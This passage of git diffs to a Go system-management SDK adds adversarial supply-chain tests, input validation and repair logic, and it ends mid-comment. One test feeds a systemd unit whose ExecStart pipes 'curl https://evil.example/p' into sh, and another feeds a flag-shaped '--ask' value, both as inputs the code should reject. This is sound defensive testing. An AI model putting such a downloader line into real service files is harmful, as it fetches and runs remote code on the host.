@@ -457,6 +459,15 @@ func isPrivilegedMutation(c sdkexec.Command) bool {
 func containsArg(args []string, want string) bool {
 	for _, arg := range args {
 		if arg == want {
+			return true
+		}
+	}
+	return false
+}
+
+func containsPrefixedArg(args []string, prefix string) bool {
+	for _, arg := range args {
+		if strings.HasPrefix(arg, prefix) {
 			return true
 		}
 	}

--- a/adversary/supply_chain_machine_test.go
+++ b/adversary/supply_chain_machine_test.go
@@ -1,0 +1,228 @@
+package adversary
+
+import (
+	"context"
+	"crypto/ecdsa"
+	"crypto/elliptic"
+	"crypto/rand"
+	"crypto/x509"
+	"crypto/x509/pkix"
+	"encoding/pem"
+	"errors"
+	"math/big"
+	"path/filepath"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/manchtools/power-manage-sdk/pkg"
+	"github.com/manchtools/power-manage-sdk/sys/catrust"
+	"github.com/manchtools/power-manage-sdk/sys/dns"
+	sdkexec "github.com/manchtools/power-manage-sdk/sys/exec"
+	"github.com/manchtools/power-manage-sdk/sys/exec/exectest"
+	"github.com/manchtools/power-manage-sdk/sys/remote"
+	"github.com/manchtools/power-manage-sdk/sys/repo"
+	"github.com/manchtools/power-manage-sdk/sys/service"
+)
+
+// TestAdversarialSupplyChainTrustMachine covers attack classes that are hard to
+// see in package-local tests: trust downgrades, hostile host output reused as
+// privileged input, and failed multi-step mutations that leave a foothold behind.
+func TestAdversarialSupplyChainTrustMachine(t *testing.T) {
+	programs := []attackProgram{
+		repositoryTrustDowngradeProgram(),
+		trustAnchorAndUnitDropperProgram(),
+		hostOutputConfusionProgram(),
+		partialSideEffectProgram(),
+	}
+	for _, program := range programs {
+		t.Run(program.name, func(t *testing.T) {
+			env := &attackEnv{ctx: context.Background()}
+			for _, step := range program.steps {
+				t.Run(step.name, func(t *testing.T) {
+					checkOracle(t, step, step.run(t, env))
+				})
+			}
+		})
+	}
+}
+
+func repositoryTrustDowngradeProgram() attackProgram {
+	return attackProgram{
+		name: "repository trust downgrade",
+		steps: []programStep{
+			{
+				name:   "APT Trusted=yes repository is rejected before apply",
+				oracle: mustReject | noPrivilegedMutation,
+				run: func(t *testing.T, _ *attackEnv) observation {
+					r := exectest.New(sdkexec.Sudo)
+					m, err := repo.New(pkg.Apt, r)
+					if err == nil {
+						err = m.Validate(repo.Repository{Name: "corp", Apt: &repo.AptConfig{URL: "https://repo.example/deb", Trusted: true}})
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+			{
+				name:   "DNF gpgcheck=false with key is rejected before import",
+				oracle: mustReject | noPrivilegedMutation,
+				run: func(t *testing.T, _ *attackEnv) observation {
+					r := exectest.New(sdkexec.Sudo)
+					m, err := repo.New(pkg.Dnf, r)
+					if err == nil {
+						err = m.Validate(repo.Repository{Name: "corp", Dnf: &repo.DnfConfig{BaseURL: "https://repo.example/rpm", GPGCheck: false, GPGKey: "https://repo.example/RPM-GPG-KEY"}})
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+			{
+				name:   "Pacman SigLevel Never is rejected before config write",
+				oracle: mustReject | noPrivilegedMutation,
+				run: func(t *testing.T, _ *attackEnv) observation {
+					r := exectest.New(sdkexec.Sudo)
+					m, err := repo.New(pkg.Pacman, r)
+					if err == nil {
+						err = m.Validate(repo.Repository{Name: "corp", Pacman: &repo.PacmanConfig{Server: "https://repo.example/$repo/os/$arch", SigLevel: "Never"}})
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+			{
+				name:   "destructive remote mirror needs an integrity pin",
+				oracle: mustReject | noNetwork | noDiskMutation,
+				run: func(t *testing.T, _ *attackEnv) observation {
+					_, err := remote.NewHTTP(remote.HTTPConfig{URL: "https://repo.example/archive.tar.gz", Extract: true, Prune: true})
+					return observation{err: err, diskPath: filepath.Join(t.TempDir(), "mirror")}
+				},
+			},
+		},
+	}
+}
+
+func trustAnchorAndUnitDropperProgram() attackProgram {
+	return attackProgram{
+		name: "trust anchor and service dropper",
+		steps: []programStep{
+			{
+				name:   "CA without keyCertSign cannot enter system trust",
+				oracle: mustReject | noPrivilegedMutation,
+				run: func(t *testing.T, env *attackEnv) observation {
+					r := exectest.New(sdkexec.Sudo)
+					m, err := catrust.New(catrust.CaCertificates, r)
+					if err == nil {
+						err = m.Install(env.ctx, "corp-root", adversaryCert(t, true, x509.KeyUsageDigitalSignature))
+						if err != nil && !errors.Is(err, catrust.ErrInvalidCert) {
+							err = nil // reached filesystem/refresh instead of failing at certificate policy
+						}
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+			{
+				name:   "systemd unit cannot run a shell downloader",
+				oracle: mustReject | noPrivilegedMutation,
+				run: func(t *testing.T, env *attackEnv) observation {
+					r := exectest.New(sdkexec.Sudo)
+					m, err := service.New(service.Systemd, r)
+					if err == nil {
+						err = m.WriteUnit(env.ctx, "pm-dropper.service", "[Service]\nExecStart=/bin/sh -c 'curl https://evil.example/p | sh'\n")
+						if err != nil {
+							err = nil // host/filesystem failure is not a content-policy rejection
+						}
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+		},
+	}
+}
+
+func hostOutputConfusionProgram() attackProgram {
+	return attackProgram{
+		name: "host output confusion",
+		steps: []programStep{
+			{
+				name:   "NetworkManager connection output with newline is rejected before modify",
+				oracle: mustReject | noPrivilegedMutation,
+				run: func(t *testing.T, env *attackEnv) observation {
+					r := exectest.New(sdkexec.Direct)
+					r.Push(sdkexec.Result{Stdout: "corp\nconnection\n"}, nil)
+					m, err := dns.New(dns.NetworkManager, r)
+					if err == nil {
+						err = m.Apply(env.ctx, dns.Config{Interface: "wlan0", Nameservers: []string{"10.0.0.53"}})
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+			{
+				name:   "NetworkManager connection output with option shape is rejected before modify",
+				oracle: mustReject | noPrivilegedMutation,
+				run: func(t *testing.T, env *attackEnv) observation {
+					r := exectest.New(sdkexec.Direct)
+					r.Push(sdkexec.Result{Stdout: "--ask\n"}, nil)
+					m, err := dns.New(dns.NetworkManager, r)
+					if err == nil {
+						err = m.Apply(env.ctx, dns.Config{Interface: "wlan0", Nameservers: []string{"10.0.0.53"}})
+					}
+					return observation{err: err, commands: r.Calls()}
+				},
+			},
+		},
+	}
+}
+
+func partialSideEffectProgram() attackProgram {
+	return attackProgram{
+		name: "partial side-effect rollback",
+		steps: []programStep{
+			{
+				name:   "NetworkManager reactivation failure leaves no staged DNS mutation",
+				oracle: mustReject | noPrivilegedMutation,
+				run: func(t *testing.T, env *attackEnv) observation {
+					r := exectest.New(sdkexec.Direct)
+					r.Push(sdkexec.Result{Stdout: "Corp WiFi\n"}, nil)                    // active connection lookup
+					r.Push(sdkexec.Result{}, nil)                                         // connection modify succeeds
+					r.Push(sdkexec.Result{ExitCode: 1, Stderr: "activation failed"}, nil) // connection up fails
+					m, err := dns.New(dns.NetworkManager, r)
+					if err == nil {
+						err = m.Apply(env.ctx, dns.Config{Interface: "wlan0", Nameservers: []string{"10.0.0.53"}})
+					}
+					if err == nil {
+						err = errors.New("NetworkManager connection up unexpectedly succeeded")
+					}
+					return observation{err: err, commands: r.Calls(), additionalDetail: strings.Join(commandStrings(r.Calls()), " | ")}
+				},
+			},
+		},
+	}
+}
+
+func adversaryCert(t *testing.T, isCA bool, usage x509.KeyUsage) []byte {
+	t.Helper()
+	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
+	if err != nil {
+		t.Fatal(err)
+	}
+	tmpl := &x509.Certificate{
+		SerialNumber:          big.NewInt(1),
+		Subject:               pkix.Name{CommonName: "adversary-root"},
+		NotBefore:             time.Now().Add(-time.Hour),
+		NotAfter:              time.Now().Add(time.Hour),
+		IsCA:                  isCA,
+		BasicConstraintsValid: true,
+		KeyUsage:              usage,
+	}
+	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
+	if err != nil {
+		t.Fatal(err)
+	}
+	return pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: der})
+}
+
+func commandStrings(commands []sdkexec.Command) []string {
+	out := make([]string, 0, len(commands))
+	for _, c := range commands {
+		out = append(out, commandString(c))
+	}
+	return out
+}

--- a/adversary/supply_chain_machine_test.go
+++ b/adversary/supply_chain_machine_test.go
@@ -160,13 +160,20 @@ func partialSideEffectProgram() attackProgram {
 		name: "partial side-effect rollback",
 		steps: []programStep{
 			{
-				name:   "NetworkManager reactivation failure leaves no staged DNS mutation",
-				oracle: mustReject | noPrivilegedMutation,
+				// Apply MUST run `connection modify` to set DNS (TestNM_ApplySuccess
+				// requires it), so noPrivilegedMutation is the wrong oracle here.
+				// The real guarantee is ROLLBACK: when reactivation (`connection up`)
+				// fails after the modify, the staged — possibly attacker-influenced —
+				// DNS must not persist in the saved profile. We assert that the final
+				// command clears the staged resolver (never leaves 10.0.0.53 staged).
+				name:   "NetworkManager reactivation failure rolls back the staged DNS mutation",
+				oracle: mustReject,
 				run: func(t *testing.T, env *attackEnv) observation {
 					r := exectest.New(sdkexec.Direct)
 					r.Push(sdkexec.Result{Stdout: "Corp WiFi\n"}, nil)                    // active connection lookup
-					r.Push(sdkexec.Result{}, nil)                                         // connection modify succeeds
+					r.Push(sdkexec.Result{}, nil)                                         // connection modify (set DNS) succeeds
 					r.Push(sdkexec.Result{ExitCode: 1, Stderr: "activation failed"}, nil) // connection up fails
+					r.Push(sdkexec.Result{}, nil)                                         // rollback: clear the staged DNS
 					m, err := dns.New(dns.NetworkManager, r)
 					if err == nil {
 						err = m.Apply(env.ctx, dns.Config{Interface: "wlan0", Nameservers: []string{"10.0.0.53"}})
@@ -174,7 +181,15 @@ func partialSideEffectProgram() attackProgram {
 					if err == nil {
 						err = errors.New("NetworkManager connection up unexpectedly succeeded")
 					}
-					return observation{err: err, commands: r.Calls(), additionalDetail: strings.Join(commandStrings(r.Calls()), " | ")}
+					cmds := commandStrings(r.Calls())
+					last := ""
+					if n := len(cmds); n > 0 {
+						last = cmds[n-1]
+					}
+					if !strings.Contains(last, "modify") || strings.Contains(last, "10.0.0.53") {
+						t.Errorf("staged DNS was not rolled back after a failed reactivation; final command = %q (all: %v)", last, cmds)
+					}
+					return observation{err: err, commands: r.Calls(), additionalDetail: strings.Join(cmds, " | ")}
 				},
 			},
 		},

--- a/adversary/supply_chain_machine_test.go
+++ b/adversary/supply_chain_machine_test.go
@@ -110,8 +110,8 @@ func trustAnchorAndUnitDropperProgram() attackProgram {
 					m, err := service.New(service.Systemd, r)
 					if err == nil {
 						err = m.WriteUnit(env.ctx, "pm-dropper.service", "[Service]\nExecStart=/bin/sh -c 'curl https://evil.example/p | sh'\n")
-						if err != nil {
-							err = nil // host/filesystem failure is not a content-policy rejection
+						if err != nil && !errors.Is(err, service.ErrUnsafeUnitContent) {
+							err = nil // a host/filesystem failure is not a content-policy rejection; keep only the policy sentinel (mirrors the CA-cert case above)
 						}
 					}
 					return observation{err: err, commands: r.Calls()}

--- a/adversary/supply_chain_machine_test.go
+++ b/adversary/supply_chain_machine_test.go
@@ -50,31 +50,15 @@ func TestAdversarialSupplyChainTrustMachine(t *testing.T) {
 func repositoryTrustDowngradeProgram() attackProgram {
 	return attackProgram{
 		name: "repository trust downgrade",
+		// NOTE: apt `Trusted: yes` and dnf `gpgcheck=false` (signature
+		// verification disabled) are explicit, documented OPERATOR CHOICES, kept
+		// per the 2026-06 policy decision (same as WS8). They are allowed by
+		// design and pinned by repo's TestApt_Apply_TrustedNoKey /
+		// TestDnf_Apply_GPGCheckFalseIgnoresKey, so they are NOT adversary cases
+		// here. The downgrades that ARE refused — pacman SigLevel Never (no valid
+		// per-invocation operator semantics) and an unpinned destructive remote
+		// mirror — remain below.
 		steps: []programStep{
-			{
-				name:   "APT Trusted=yes repository is rejected before apply",
-				oracle: mustReject | noPrivilegedMutation,
-				run: func(t *testing.T, _ *attackEnv) observation {
-					r := exectest.New(sdkexec.Sudo)
-					m, err := repo.New(pkg.Apt, r)
-					if err == nil {
-						err = m.Validate(repo.Repository{Name: "corp", Apt: &repo.AptConfig{URL: "https://repo.example/deb", Trusted: true}})
-					}
-					return observation{err: err, commands: r.Calls()}
-				},
-			},
-			{
-				name:   "DNF gpgcheck=false with key is rejected before import",
-				oracle: mustReject | noPrivilegedMutation,
-				run: func(t *testing.T, _ *attackEnv) observation {
-					r := exectest.New(sdkexec.Sudo)
-					m, err := repo.New(pkg.Dnf, r)
-					if err == nil {
-						err = m.Validate(repo.Repository{Name: "corp", Dnf: &repo.DnfConfig{BaseURL: "https://repo.example/rpm", GPGCheck: false, GPGKey: "https://repo.example/RPM-GPG-KEY"}})
-					}
-					return observation{err: err, commands: r.Calls()}
-				},
-			},
 			{
 				name:   "Pacman SigLevel Never is rejected before config write",
 				oracle: mustReject | noPrivilegedMutation,

--- a/archtest/crypto_rand_test.go
+++ b/archtest/crypto_rand_test.go
@@ -1,0 +1,77 @@
+package archtest
+
+import (
+	"go/ast"
+	"strings"
+	"testing"
+)
+
+// TestCryptoRandReadErrorsAreChecked locks the entropy boundary: any direct
+// crypto/rand.Read call must inspect its error. If entropy acquisition fails and
+// code silently proceeds with a zero/partial buffer, attacker-controlled names,
+// nonces, or keys can become predictable. Helpers that need randomness should
+// return the error or use APIs that already do.
+func TestCryptoRandReadErrorsAreChecked(t *testing.T) {
+	root := moduleRoot(t)
+	files := walkGoFiles(t, root, func(rel string) bool {
+		if strings.HasPrefix(rel, "gen/") || strings.HasPrefix(rel, "archtest/") {
+			return false
+		}
+		return true
+	})
+	if len(files) == 0 {
+		t.Fatal("matches-zero guard: walked zero Go files")
+	}
+
+	checkedImports := 0
+	for _, gf := range files {
+		randName := importLocalName(gf, "crypto/rand")
+		if randName == "" {
+			continue
+		}
+		checkedImports++
+		ast.Inspect(gf.ast, func(n ast.Node) bool {
+			assign, ok := n.(*ast.AssignStmt)
+			if !ok {
+				if call := randReadCall(n, randName); call != nil {
+					t.Errorf("%s:%d: crypto/rand.Read result is not assigned; check and propagate the error", gf.rel, gf.line(call))
+				}
+				return true
+			}
+			for i, rhs := range assign.Rhs {
+				call := randReadCall(rhs, randName)
+				if call == nil {
+					continue
+				}
+				if len(assign.Lhs) <= i+1 || isBlankIdent(assign.Lhs[i+1]) {
+					t.Errorf("%s:%d: crypto/rand.Read error is discarded; handle it fail-closed", gf.rel, gf.line(call))
+				}
+			}
+			return false
+		})
+	}
+	if checkedImports == 0 {
+		t.Fatal("matches-zero guard: no crypto/rand imports found")
+	}
+}
+
+func randReadCall(n ast.Node, randName string) *ast.CallExpr {
+	call, ok := n.(*ast.CallExpr)
+	if !ok {
+		return nil
+	}
+	sel, ok := call.Fun.(*ast.SelectorExpr)
+	if !ok || sel.Sel.Name != "Read" {
+		return nil
+	}
+	pkg, ok := sel.X.(*ast.Ident)
+	if !ok || pkg.Name != randName {
+		return nil
+	}
+	return call
+}
+
+func isBlankIdent(expr ast.Expr) bool {
+	id, ok := expr.(*ast.Ident)
+	return ok && id.Name == "_"
+}

--- a/archtest/crypto_rand_test.go
+++ b/archtest/crypto_rand_test.go
@@ -7,10 +7,19 @@ import (
 )
 
 // TestCryptoRandReadErrorsAreChecked locks the entropy boundary: any direct
-// crypto/rand.Read call must inspect its error. If entropy acquisition fails and
-// code silently proceeds with a zero/partial buffer, attacker-controlled names,
-// nonces, or keys can become predictable. Helpers that need randomness should
-// return the error or use APIs that already do.
+// crypto/rand.Read call must CAPTURE its error to a named (non-blank) identifier.
+// If entropy acquisition fails and code silently proceeds with a zero/partial
+// buffer, attacker-controlled names, nonces, or keys can become predictable.
+// Helpers that need randomness should return the error or use APIs that already do.
+//
+// Scope: this guard rejects the two discard shapes the Go compiler PERMITS — a
+// bare rand.Read(...) with no captured error, and capture-to-blank (`_`). The
+// remaining shape (capture to a named err that is then never read) is not a gap:
+// Go rejects an unused local at compile time, and staticcheck (SA4006/ineffassign,
+// run in CI) rejects an ineffectual reassignment — so "captured but unchecked"
+// cannot ship. The three gates together prove the error is handled; this one owns
+// the compiler-permitted discards. Deliberately pure-stdlib AST (no type/flow
+// analysis) to stay robust, consistent with the other fitness functions.
 func TestCryptoRandReadErrorsAreChecked(t *testing.T) {
 	root := moduleRoot(t)
 	files := walkGoFiles(t, root, func(rel string) bool {

--- a/archtest/reveal_sink_test.go
+++ b/archtest/reveal_sink_test.go
@@ -16,6 +16,7 @@ var revealSinkAllowlist = map[string]string{
 	"sys/encryption/luks.go :: key.Reveal()":       "LUKS key file in /dev/shm: cryptsetup --key-file sink (never argv)",
 	"sys/encryption/tpm.go :: key.Reveal()":        "systemd-cryptenroll stdin: the TPM-enrollment passphrase sink (never argv)",
 	"sys/network/keyfile.go :: p.PSK.Reveal()":     "NetworkManager keyfile [wifi-security] psk= line (0600 file, never argv)",
+	"sys/network/keyfile.go :: psk.Reveal()":       "validatePSK WPA2 length/charset gate before the keyfile write — same secret the psk= sink writes, never logged (errors omit the value) or argv",
 	"sys/network/certs.go :: p.ClientKey.Reveal()": "EAP-TLS client-key.pem (0600 file write + on-disk drift compare, never argv)",
 }
 

--- a/docs/02-concepts/01-architecture.md
+++ b/docs/02-concepts/01-architecture.md
@@ -73,7 +73,7 @@ model; the reference lists the surface.
 
 ## Construction validates before it works
 
-<!-- docref: begin src=sys/catrust/catrust.go#New:987cc8b3 -->
+<!-- docref: begin src=sys/catrust/catrust.go#New:78dcd9a7 -->
 `New` is pure and fail-closed: it rejects a nil Runner and an unrecognized
 Backend, returning an error, before constructing a usable handle. A successful
 call gives you a Manager that is ready to use.

--- a/docs/02-concepts/02-backends.md
+++ b/docs/02-concepts/02-backends.md
@@ -13,15 +13,16 @@ at construction.
 
 ## One backend per host, chosen explicitly
 
-<!-- docref: begin src=sys/catrust/catrust.go#CaCertificates:15a42eb7 -->
+<!-- docref: begin src=sys/catrust/catrust.go#CaCertificates:350dcebc -->
 A `Backend` is a small enum whose first real value is one (`iota + 1`), so its
 zero value is intentionally invalid — there is no implicit default, and a
 caller must name the backend it wants:
 <!-- docref: end -->
 
 ```go
-m, err := catrust.New(catrust.CaCertificates, r) // Debian/Ubuntu flow
-// catrust.New(catrust.P11Kit, r)                // Fedora/RHEL/SUSE flow
+m, err := catrust.New(catrust.CaCertificates, r)  // Debian/Ubuntu
+// catrust.New(catrust.P11Kit, r)                 // Fedora/RHEL/EL/Arch
+// catrust.New(catrust.SuseCaCertificates, r)     // openSUSE/SLES
 ```
 
 An unrecognized backend is rejected at `New` with `ErrUnknownBackend` rather
@@ -33,7 +34,7 @@ a no-op.
 You usually know the target platform, but when you don't, `Detect` reports the
 backends usable on *this* host so the caller can pick one:
 
-<!-- docref: begin src=sys/catrust/detect.go#Detect:047f0669 -->
+<!-- docref: begin src=sys/catrust/detect.go#Detect:0d85bd62 -->
 `Detect` probes the host (typically by looking for each backend's tools on
 `PATH`) and returns the list of backends that are usable here. It reports what
 is available; it does not choose or activate anything — the caller passes one

--- a/maintenance/window.go
+++ b/maintenance/window.go
@@ -199,6 +199,16 @@ func parseClock(s string) (int, error) {
 	if len(s) != 5 || s[2] != ':' {
 		return 0, fmt.Errorf("clock %q must be HH:MM", s)
 	}
+	// strconv.Atoi accepts a leading sign ("+9", "-1"), so a signed hour or
+	// minute ("+9:00") would slip through the range check below. Require both
+	// fields to be exactly two ASCII digits before parsing — the wire format is
+	// fixed-width zero-padded HH:MM, never a signed integer.
+	if !isTwoDigits(s[:2]) {
+		return 0, fmt.Errorf("hour %q must be two digits", s[:2])
+	}
+	if !isTwoDigits(s[3:]) {
+		return 0, fmt.Errorf("minute %q must be two digits", s[3:])
+	}
 	h, err := strconv.Atoi(s[:2])
 	if err != nil || h < 0 || h > 23 {
 		return 0, fmt.Errorf("hour %q out of range 00-23", s[:2])
@@ -208,6 +218,16 @@ func parseClock(s string) (int, error) {
 		return 0, fmt.Errorf("minute %q out of range 00-59", s[3:])
 	}
 	return h*60 + m, nil
+}
+
+// isTwoDigits reports whether s is exactly two ASCII digits (0-9). Used to
+// reject signed/non-numeric clock fields that strconv.Atoi would otherwise
+// accept (a leading '+' or '-').
+func isTwoDigits(s string) bool {
+	if len(s) != 2 {
+		return false
+	}
+	return s[0] >= '0' && s[0] <= '9' && s[1] >= '0' && s[1] <= '9'
 }
 
 // isWeekdayToken accepts only the canonical lowercase tokens the

--- a/maintenance/window_test.go
+++ b/maintenance/window_test.go
@@ -77,6 +77,13 @@ func TestValidate(t *testing.T) {
 			true,
 		},
 		{
+			"signed hour rejected",
+			&pmv1.MaintenanceWindow{Schedule: []*pmv1.MaintenanceWindowEntry{
+				{Days: []string{"mon"}, Allow: "+9:00-17:00"},
+			}},
+			true,
+		},
+		{
 			"missing dash",
 			&pmv1.MaintenanceWindow{Schedule: []*pmv1.MaintenanceWindowEntry{
 				{Days: []string{"mon"}, Allow: "09:0017:00X"},

--- a/pkg/apt.go
+++ b/pkg/apt.go
@@ -430,6 +430,38 @@ func (a *apt) ListVersions(ctx context.Context, name string) (*VersionInfo, erro
 	return info, nil
 }
 
+// LocalPackageInfo reads the canonical Package/Version/Architecture out of a
+// local .deb via `dpkg-deb -f` (an unprivileged read). The Package field a
+// crafted .deb embeds is untrusted, so it is re-validated with
+// ValidatePackageName — the same grammar Remove/IsInstalled would feed it
+// to — before being returned; a flag-shaped or metacharacter-bearing name is
+// rejected here rather than surfacing as a package-manager flag downstream.
+func (a *apt) LocalPackageInfo(ctx context.Context, path string) (*LocalPackage, error) {
+	if err := ValidateLocalPackagePath(path); err != nil {
+		return nil, err
+	}
+	out, err := readOut(ctx, a.r, "dpkg-deb", "-f", path, "Package", "Version", "Architecture")
+	if err != nil {
+		return nil, err
+	}
+	lines := splitPositionalFields(out)
+	if len(lines) == 0 {
+		return nil, fmt.Errorf("pkg: dpkg-deb reported no Package field for %q", path)
+	}
+	name := lines[0]
+	if err := ValidatePackageName(name); err != nil {
+		return nil, fmt.Errorf("pkg: local .deb reports an unsafe package name: %w", err)
+	}
+	info := &LocalPackage{Name: name}
+	if len(lines) > 1 {
+		info.Version = lines[1]
+	}
+	if len(lines) > 2 {
+		info.Arch = lines[2]
+	}
+	return info, nil
+}
+
 // IsInstalled reports whether a package is installed (dpkg -s exits 0).
 func (a *apt) IsInstalled(ctx context.Context, name string) (bool, error) {
 	if err := ValidatePackageName(name); err != nil {

--- a/pkg/dnf.go
+++ b/pkg/dnf.go
@@ -220,7 +220,8 @@ func (d *dnf) Autoremove(ctx context.Context) (pmexec.Result, error) {
 }
 
 // Repair re-runs the last transaction, drops duplicate packages, and verifies
-// the rpm database. Every step is best-effort (logged, not fatal) except a
+// the rpm database — escalating to a full `rpm --rebuilddb` when --verifydb
+// reports CORRUPTION. Every step is best-effort (logged, not fatal) except a
 // context cancellation, which short-circuits. The returned Result is that of the
 // last step run (or the step that cancelled).
 func (d *dnf) Repair(ctx context.Context) (pmexec.Result, error) {
@@ -230,13 +231,7 @@ func (d *dnf) Repair(ctx context.Context) (pmexec.Result, error) {
 	}{
 		{"dnf history redo last", func() (pmexec.Result, error) { return d.write(ctx, "history", "redo", "last", "-y") }},
 		{"dnf remove --duplicates", func() (pmexec.Result, error) { return d.write(ctx, "remove", "--duplicates", "-y") }},
-		{"rpm --verifydb", func() (pmexec.Result, error) {
-			res, err := runRead(ctx, d.r, "rpm", "--verifydb")
-			if err != nil {
-				return res, err
-			}
-			return res, asCommandError("rpm", res)
-		}},
+		{"rpm --verifydb", func() (pmexec.Result, error) { return d.verifyOrRebuildDB(ctx) }},
 	}
 	var last pmexec.Result
 	for _, s := range steps {
@@ -247,6 +242,31 @@ func (d *dnf) Repair(ctx context.Context) (pmexec.Result, error) {
 		}
 	}
 	return last, nil
+}
+
+// verifyOrRebuildDB runs `rpm --verifydb` (an unprivileged read) and, ONLY when
+// it reports corruption (a non-zero exit — a genuine rpmdb verdict, as opposed
+// to a runner failure where rpm could not run at all), escalates to a full
+// `rpm --rebuilddb` to rebuild the database. The rebuild is itself best-effort:
+// its result/error is returned to the caller's bestEffortStep, so a wedged
+// rebuild is logged rather than fatal, while a cancelled context fails the
+// rebuild closed (runPriv refuses to spawn) and propagates as the cancellation.
+func (d *dnf) verifyOrRebuildDB(ctx context.Context) (pmexec.Result, error) {
+	res, err := runRead(ctx, d.r, "rpm", "--verifydb")
+	if err != nil {
+		// rpm could not be run at all (binary missing, context cancelled): there is
+		// no corruption verdict to act on, so do not rebuild.
+		return res, err
+	}
+	if res.ExitCode == 0 {
+		return res, nil // database is clean — no rebuild
+	}
+	// Corruption reported: escalate to a rebuild of the rpm database.
+	rebuilt, rerr := runPriv(ctx, d.r, true, nil, "rpm", "--rebuilddb")
+	if rerr != nil {
+		return rebuilt, rerr
+	}
+	return rebuilt, asCommandError("rpm", rebuilt)
 }
 
 // Search searches package names/summaries (exit 1 = no matches).
@@ -451,6 +471,15 @@ func (d *dnf) ListVersions(ctx context.Context, name string) (*VersionInfo, erro
 		})
 	}
 	return info, nil
+}
+
+// LocalPackageInfo reads the canonical NAME/VERSION-RELEASE/ARCH out of a local
+// .rpm via `rpm -qp --qf` (an unprivileged read). %{NAME} from a crafted .rpm is
+// untrusted, so it is re-validated with ValidateRpmPackageName (the RPM grammar —
+// which allows '+' for libstdc++ but no flag/metacharacter) before being
+// returned. The shared rpmLocalPackageInfo helper keeps dnf and zypper in lockstep.
+func (d *dnf) LocalPackageInfo(ctx context.Context, path string) (*LocalPackage, error) {
+	return rpmLocalPackageInfo(ctx, d.r, path)
 }
 
 // IsInstalled reports whether a package is installed (rpm -q exits 0).

--- a/pkg/dnf_test.go
+++ b/pkg/dnf_test.go
@@ -373,6 +373,93 @@ func TestDnf_Repair(t *testing.T) {
 			t.Fatalf("a non-cancellation verifydb runner error must be swallowed, got %v", err)
 		}
 	})
+
+	// Gap #5: when `rpm --verifydb` reports CORRUPTION (a non-zero exit), Repair
+	// escalates to `rpm --rebuilddb` to rebuild the rpm database — the recovery
+	// step the agent's UPDATE action used to shell itself. The rebuild is itself
+	// best-effort (a wedged rebuild is logged, not fatal), mirroring every other
+	// repair step.
+	t.Run("verifydb corruption escalates to rpm --rebuilddb", func(t *testing.T) {
+		m, f := dnfM(t)
+		ok(f, "")                                                        // history redo
+		ok(f, "")                                                        // remove --duplicates
+		f.Push(pmexec.Result{ExitCode: 1, Stderr: "rpmdb corrupt"}, nil) // rpm --verifydb: corruption
+		ok(f, "")                                                        // rpm --rebuilddb
+		if _, err := m.Repair(ctx); err != nil {
+			t.Fatalf("rebuilddb is best-effort, must not fail: %v", err)
+		}
+		calls := f.Calls()
+		if len(calls) != 4 {
+			t.Fatalf("want 4 steps (…verifydb, rebuilddb), got %d: %v", len(calls), calls)
+		}
+		last := calls[3]
+		if last.Name != "rpm" || len(last.Args) != 1 || last.Args[0] != "--rebuilddb" {
+			t.Errorf("4th step = %s %v, want rpm --rebuilddb", last.Name, last.Args)
+		}
+		if !last.Escalate {
+			t.Error("rpm --rebuilddb mutates the rpmdb; it must escalate")
+		}
+	})
+
+	// The corollary: a CLEAN verifydb (exit 0) does NOT rebuild — the costly
+	// rebuild only runs when corruption is actually reported.
+	t.Run("clean verifydb does NOT rebuild", func(t *testing.T) {
+		m, f := dnfM(t)
+		ok(f, "") // history redo
+		ok(f, "") // remove --duplicates
+		ok(f, "") // rpm --verifydb: clean
+		if _, err := m.Repair(ctx); err != nil {
+			t.Fatal(err)
+		}
+		for _, c := range f.Calls() {
+			for _, a := range c.Args {
+				if a == "--rebuilddb" {
+					t.Fatal("a clean verifydb must NOT trigger rpm --rebuilddb")
+				}
+			}
+		}
+		if len(f.Calls()) != 3 {
+			t.Fatalf("clean verifydb → 3 steps, got %d", len(f.Calls()))
+		}
+	})
+
+	// A verifydb RUNNER error (binary gone) is not "corruption reported" — there
+	// is no rpmdb verdict to act on, so no rebuild is attempted.
+	t.Run("verifydb runner error does NOT rebuild", func(t *testing.T) {
+		m, f := dnfM(t)
+		ok(f, "")
+		ok(f, "")
+		f.Push(pmexec.Result{}, errors.New("rpm gone")) // verifydb: runner failure, not a corruption verdict
+		if _, err := m.Repair(ctx); err != nil {
+			t.Fatalf("swallowed best-effort, got %v", err)
+		}
+		for _, c := range f.Calls() {
+			for _, a := range c.Args {
+				if a == "--rebuilddb" {
+					t.Fatal("a verifydb runner error must NOT trigger a rebuild (no corruption verdict)")
+				}
+			}
+		}
+	})
+
+	// rebuilddb after corruption respects cancellation: a context cancelled before
+	// the rebuild stops the chain rather than running an escalated command.
+	t.Run("cancellation before rebuild stops the chain", func(t *testing.T) {
+		cctx, cancel := context.WithCancel(context.Background())
+		f := newFake()
+		ok(f, "") // history redo
+		ok(f, "") // remove --duplicates
+		// verifydb reports corruption, then the context is cancelled before rebuild.
+		f.Push(pmexec.Result{ExitCode: 1, Stderr: "corrupt"}, nil)
+		r := &cancelAfterRunner{inner: f, n: 3, cancel: cancel}
+		dm, err := New(Dnf, r)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if _, err := dm.Repair(cctx); !errors.Is(err, context.Canceled) {
+			t.Fatalf("err = %v, want context.Canceled from the cancelled rebuild", err)
+		}
+	})
 }
 
 func TestDnf_Search(t *testing.T) {

--- a/pkg/exec.go
+++ b/pkg/exec.go
@@ -3,6 +3,7 @@ package pkg
 import (
 	"bytes"
 	"context"
+	"fmt"
 	"io"
 	"strings"
 
@@ -92,6 +93,53 @@ func asCommandError(name string, res pmexec.Result) error {
 		return nil
 	}
 	return &pmexec.CommandError{Name: name, ExitCode: res.ExitCode, Stderr: res.Stderr}
+}
+
+// rpmLocalPackageInfo reads NAME / VERSION-RELEASE / ARCH out of a local .rpm via
+// `rpm -qp --qf` (an unprivileged read), shared by the dnf and zypper backends so
+// their local-introspection cannot drift. The %{NAME} a crafted .rpm embeds is
